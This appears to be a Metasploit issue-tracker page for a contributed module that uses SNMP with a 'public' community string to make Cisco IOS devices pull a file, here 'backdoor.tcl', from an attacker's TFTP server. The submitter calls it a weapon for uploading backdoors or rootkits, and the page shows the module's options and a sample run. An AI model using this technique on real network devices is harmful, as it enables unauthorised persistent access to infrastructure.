Feature #3429
Cisco IOS SNMP file copy (TFTP)
| Status: | Closed | Start date: | 12/29/2010 | |
|---|---|---|---|---|
| Priority: | Normal | Due date: | ||
| Assignee: | HD Moore | % Done: | 100% |
|
| Category: | modules - auxiliary | |||
| Target version: | - | |||
| Resolution: | How To Use: | |||
| Release Note: |
Description
Hi,
Please find the module in attachment to copy files from the Metasploit TFTP server to a Cisco device flash memory.
That's a nice weapon to upload TCL backdoors or IOS rootkits via SNMP/TFTP.
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
COMMUNITY public yes SNMP Community String
LHOST 10.100.100.100 no The IP address of the system running this module
RETRIES 1 yes SNMP Retries
RHOSTS 10.100.100.200 yes The target address range or CIDR identifier
RPORT 161 yes The target port
SOURCE backdoor.tcl yes The filename to upload
TFTPROOT /tmp yes The TFTP root directory to serve files from
THREADS 1 yes The number of concurrent threads
TIMEOUT 1 yes SNMP Timeout
VERSION 1 yes SNMP Version <1/2c>
msf auxiliary(cisco_copy_file) > run
[*] Starting TFTP server...
[*] Copying file backdoor.tcl to 10.100.100.200...
[*] Scanned 1 of 1 hosts (100% complete)
[*] Providing some time for transfers to complete...
[*] Shutting down the TFTP service...
[*] Auxiliary module execution completed
msf auxiliary(cisco_copy_file) >
Cheers,
pello
cisco_copy_file.rb
(4.7 kB)
Associated revisions
Merges pello's Cisco uploader module, merges changes back into the TFTP server class. Fixes #3429
git-svn-id: file:///home/svn/framework3/trunk@11454 4d416f70-5f16-0410-b530-b9f4589650da
History
#1 Updated by HD Moore over 1 year ago
- Assignee changed from Joshua J. Drake to HD Moore
#2 Updated by HD Moore over 1 year ago
- Status changed from New to Resolved
- % Done changed from 90 to 100
Applied in changeset r11454.
#3 Updated by Jonathan Cran over 1 year ago
- Status changed from Resolved to Closed